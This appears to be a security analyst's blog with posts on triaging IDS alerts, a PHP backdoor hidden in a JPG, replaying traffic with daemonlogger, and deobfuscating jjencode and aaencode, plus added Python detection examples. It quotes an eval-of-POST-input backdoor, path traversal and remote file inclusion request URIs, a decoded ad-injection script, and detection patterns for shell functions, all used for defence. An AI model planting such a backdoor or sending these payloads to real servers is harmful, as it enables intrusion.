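To show the grouping step described above in code, here is an added Python example (it is not Moloch's code or the author's). It takes constructed session records shaped like the URI and status fields you would read off the SPI View URI column, buckets them by attack family, and reports the bucket that does not fit the noise; the IP and hostnames are placeholders.

```python
import re
from collections import Counter, defaultdict

# Constructed sample records (source IP, request URI, HTTP status), shaped like the
# fields you would read off the SPI View URI column. IPs and hosts are placeholders.
SESSIONS = [
    ("203.0.113.7", "/index.php?page=../../../../etc/passwd", 404),
    ("203.0.113.7", "/index.php?page=http://rfi-host.invalid/a.txt?", 301),
    ("203.0.113.7", "/admin.php?inc=../../../../../etc/passwd%00", 404),
    ("203.0.113.7", "/admin.php?inc=http://rfi-host.invalid/b.txt?", 301),
    ("203.0.113.7", "/view.php?file=../../../../etc/passwd", 404),
    ("203.0.113.7", "/view.php?file=http://rfi-host.invalid/c.txt?", 301),
    ("203.0.113.7", "/news.php?id=../../../etc/passwd", 404),
    ("203.0.113.7", "/news.php?id=http://rfi-host.invalid/d.txt?", 301),
    ("203.0.113.7", "/install/index.php?step=3", 200),   # the one that is not noise
]

# Attack families the post talks about; first matching pattern wins, else "other".
CLASSES = [
    ("traversal_etc_passwd", re.compile(r"(\.\./|%2e%2e%2f)+.*etc/passwd", re.I)),
    ("remote_file_inclusion", re.compile(r"=https?://", re.I)),
]


def classify_uri(uri):
    """Return the attack family label for a URI, or 'other' if nothing matches."""
    for label, pattern in CLASSES:
        if pattern.search(uri):
            return label
    return "other"


def triage(sessions):
    """Bucket sessions by attack family, keeping a status-code histogram per bucket.

    Returns {label: {"count": int, "statuses": Counter, "examples": [uri, ...]}}.
    """
    buckets = defaultdict(lambda: {"count": 0, "statuses": Counter(), "examples": []})
    for _src, uri, status in sessions:
        b = buckets[classify_uri(uri)]
        b["count"] += 1
        b["statuses"][status] += 1
        if len(b["examples"]) < 3:
            b["examples"].append(uri)
    return dict(buckets)


def outliers(summary, max_share=0.2):
    """Labels whose share of all sessions is below max_share: the ones to open by hand."""
    total = sum(b["count"] for b in summary.values())
    return sorted(label for label, b in summary.items() if b["count"] / total < max_share)


if __name__ == "__main__":
    summary = triage(SESSIONS)
    for label, b in summary.items():
        print(f"{label:24s} {b['count']:4d}  statuses={dict(b['statuses'])}")
    print("look at by hand:", outliers(summary))
```

The two noisy families show up with uniform 404/301 responses, while the single request that fits neither pattern is the one worth opening in the Sessions tab.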

Thursday, February 20, 2014

Base64 alerts

Base64 encoding alerts are usually low impact, but if you see a string like this:


Which decodes to this:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

it’s indicative of malware hiding in a JPG.
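As an added Python example (mine, not the author's), here is the decode-and-judge step done in code: it pulls Base64 runs out of a byte stream, decodes them, and reports the ones that decode to PHP taking attacker input. The sample input is the one-liner from the post, Base64-encoded here and placed in a hand-built JPEG comment segment; it is constructed, not a real capture.

```python
import base64
import binascii
import re

# Constructed sample: the PHP one-liner from the post, Base64-encoded and placed in a
# JPEG comment (COM) segment built by hand here. This is not a real capture.
PHP_BACKDOOR = b'if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}'
ENCODED = base64.b64encode(PHP_BACKDOOR)          # what the IDS alert would show you
COMMENT = b"note: " + ENCODED
SAMPLE_JPEG = (b"\xff\xd8"                                                # SOI
               + b"\xff\xfe" + (len(COMMENT) + 2).to_bytes(2, "big") + COMMENT  # COM
               + b"\xff\xdb\x00\x04\x00\x00"                                # stub segment
               + b"\xff\xd9")                                               # EOI

# A Base64 run long enough to be worth decoding (short runs are mostly noise).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators of PHP that executes attacker-supplied input. Two must co-occur to
# count, which keeps ordinary Base64 text (images, fonts, tokens) out of the results.
INDICATORS = [
    ("eval", re.compile(rb"\beval\s*\(")),
    ("superglobal", re.compile(rb"\$_(POST|GET|REQUEST|COOKIE)\b")),
    ("base64_decode", re.compile(rb"\bbase64_decode\s*\(")),
    ("shell", re.compile(rb"\b(system|passthru|shell_exec|exec)\s*\(")),
]


def decode_candidates(data):
    """Yield (offset, decoded_bytes) for each Base64 run in data that decodes cleanly."""
    for m in B64_RUN.finditer(data):
        chunk = m.group(0)
        chunk += b"=" * (-len(chunk) % 4)        # tolerate stripped padding
        try:
            yield m.start(), base64.b64decode(chunk, validate=True)
        except (binascii.Error, ValueError):      # not valid Base64 after all
            continue


def find_embedded_php(data, min_indicators=2):
    """Return [(offset, [indicator names], decoded text)] for runs that look like
    a PHP backdoor of the kind the post shows."""
    hits = []
    for offset, decoded in decode_candidates(data):
        names = [name for name, pat in INDICATORS if pat.search(decoded)]
        if len(names) >= min_indicators:
            hits.append((offset, names, decoded.decode("latin-1")))
    return hits


if __name__ == "__main__":
    for offset, names, text in find_embedded_php(SAMPLE_JPEG):
        print(f"offset {offset}: {names}\n  {text}")
```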

Monday, February 10, 2014

Generating Traffic With Daemonlogger for IDS/IPS Testing

daemonlogger, the packet capturing utility by Marty Roesch, can also act as a soft tap (a software tap, as opposed to a physical tap). This means you can sniff traffic from one interface and replay those packets to another interface.
For example, say you have a packet capture box that is receiving packets from a tap on interface 1, and you have an IDS sensor that you want to send traffic to in order to test a policy or a signature, or that you're evaluating.
You can use daemonlogger to sniff the traffic on interface 1 and send that traffic to another interface that is patched to the sensor.
Assuming you have eth1 patched to the tap and eth2 patched to the monitoring interface on the sensor, run the command:
daemonlogger -i eth1 -o eth2
and all the packets from eth1 will be streamed to eth2.
You can also replay a pcap in a similar manner. Just substitute -R for -i (note this is a capital R; lower case r activates the ring buffer):
daemonlogger -R new_trojan.pcap -o eth2
You can use BPFs as well, the same way you would when capturing traffic.
If you put your Berkeley Packet Filters in a file, you can load it using -f.

Friday, January 17, 2014

jjencode - Making Sense Out Of Gibberish

I recently investigated an alert that used an encoding I hadn't encountered before. The data looked like this:

var $$=~[];
var __$="";

I discovered the encoding was jjencode, written by Yosuke Hasegawa. I found a nice article on deobfuscating it on Kahu Security and worked through decoding it manually, but it was a slow process.

I then found a nice write-up of how the encoding actually works on the Avast blog at
At the end of the article is a link to another decoder (I'd tried several without success), and this one, by Honza Zíka, works quite well.

Before running the code through this decoder I used Notepad++ to replace each semicolon with a semicolon and a new line so I could see the variable assignments, and removed the var keyword at the beginning of each section.
Once that was done, the site decoded the text and I was left with a block of text with a lot of octal values:


Now all that was left was to convert the octal values to ASCII. There are lots of sites that will do that; I use the Sucuri site, which handles HTML, hex and octal. After running the code through this site, I finally had the decoded packet data.

return"function StorageDB(t){t=t||{},this.db=t.db||this.options.db;try{||\"{}\")}catch(e){throw new Error('Invalid db data \"'+this.db+'\".')}}function StorageCollection(t,e){this.db=t,}function getAdvertDiv(){var t=\"apbmsho\",e=document.getElementById(t);return e&&e.parentNode.removeChild(e),e=document.createElement(\"div\"),,\"fixed\",,e}function $el(t,e){var o=document.createElement(t);for(var a in e)o[a]=e[a];return o}function objectToCss(t){var e,o,a,i,r,n;n=[];for(e in t){r=\"\",o=t[e],r+=e+\" {\";for(a in o)i=o[a],a=a.replace(/[a-z][A-Z]/g,function(t){return t.split(\"\").join(\"-\").toLowerCase()}),r+=a+\" : \"+i+\";\";r+=\"}\",n.push(r)}return n.join(\"\\r\\n\")}function bindAll(t,e){var o,a,i;for(o in e){a=e[o];var r=t.querySelector(o);if(r)for(i in a)r.addEventListener(i,a[i],!1)}}function script(t,e){var o=document.createElement(\"script\");o.src=toUrl(t,e),document.head.appendChild(o)}function toUrl(t,e){var o=t.indexOf(\"?\")>-1?\"&\":\"?\",a=[];for(var i in e)a.push(encodeURIComponent(i)+\"=\"+encodeURIComponent(e[i]));return a.length&&(t+=o+a.join(\"&\"))
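Added Python example, not from the post or from any of the sites it names: the two mechanical steps of the workflow above, splitting statements onto separate lines with the leading var removed, and converting the escape sequences in the decoder's output back to ASCII. It goes beyond the octal case in the post and also handles \xNN and \uNNNN escapes; the sample string is constructed, not the actual alert data.

```python
import re

# Constructed sample of what the jjencode decoder step leaves behind: a JS string
# literal made entirely of octal escapes (made up here, not the post's actual data).
SAMPLE = (r'"\150\164\164\160\72\57\57\145\170\141\155\160\154\145'
          r'\56\151\156\166\141\154\151\144\57\141\56\152\163"')

# One JS escape: octal \NNN, hex \xNN, unicode \uNNNN, or a single escaped character.
ESCAPE = re.compile(r"\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4})|(.))", re.S)
SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v"}


def unescape_js(s):
    """Replace JS escape sequences in s with the characters they stand for."""
    def repl(m):
        octal, hexv, uni, other = m.groups()
        if octal is not None:
            return chr(int(octal, 8))
        if hexv is not None:
            return chr(int(hexv, 16))
        if uni is not None:
            return chr(int(uni, 16))
        return SIMPLE.get(other, other)   # \\ \" \' \/ and friends map to themselves
    return ESCAPE.sub(repl, s)


def split_statements(js):
    """One statement per line with the leading 'var ' removed (the Notepad++ prep step).
    Splits on every ';', so it assumes the input has no ';' inside string literals."""
    parts = [p.strip() for p in js.split(";")]
    return "\n".join(p[4:] if p.startswith("var ") else p for p in parts if p)


if __name__ == "__main__":
    print(split_statements('var $$=~[];var __$="";'))
    print(unescape_js(SAMPLE))   # "http://example.invalid/a.js"
```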

While manually working through some new encoding is always good for your general understanding and for extending your skill set, when you're doing intrusion analysis you don't always have the time to do so during an investigation (I'd go so far as to say you usually don't). Add as many sites to your toolkit as you can find that will help you quickly deobfuscate the packet data you encounter, and keep them accessible from any location you work from. As they say at SANS, prevention is ideal but detection is a must.

By the way, if you like this "non-alphanumeric JavaScript encoding", there is another one that uses Japanese-style emoticons, called aaencode, written by the same author. You can check it out at

゚ω゚ノ= /`m´)ノ ~┻━┻   //*´∇`*/ ['_']; o=(゚ー゚)  =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

Monday, January 13, 2014


HackVertor is a nice site for decoding all sorts of encoded content. It supports a large list of formats, including jjencode.
The site is at

It not only does encoding/decoding, but also has functions for some basic crypto (XOR, ROT13, etc.), string functions, hash calculation, XSS, math functions and a lot more. Excellent site.
